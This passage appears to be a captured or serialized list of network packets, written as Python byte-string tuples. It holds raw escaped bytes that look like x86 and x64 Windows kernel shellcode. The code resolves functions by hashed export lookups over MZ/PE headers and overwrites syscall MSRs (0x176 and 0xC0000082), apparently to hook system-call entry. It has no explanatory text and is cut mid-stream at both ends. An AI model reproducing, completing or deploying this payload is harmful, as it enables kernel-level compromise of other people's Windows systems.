\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 7, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4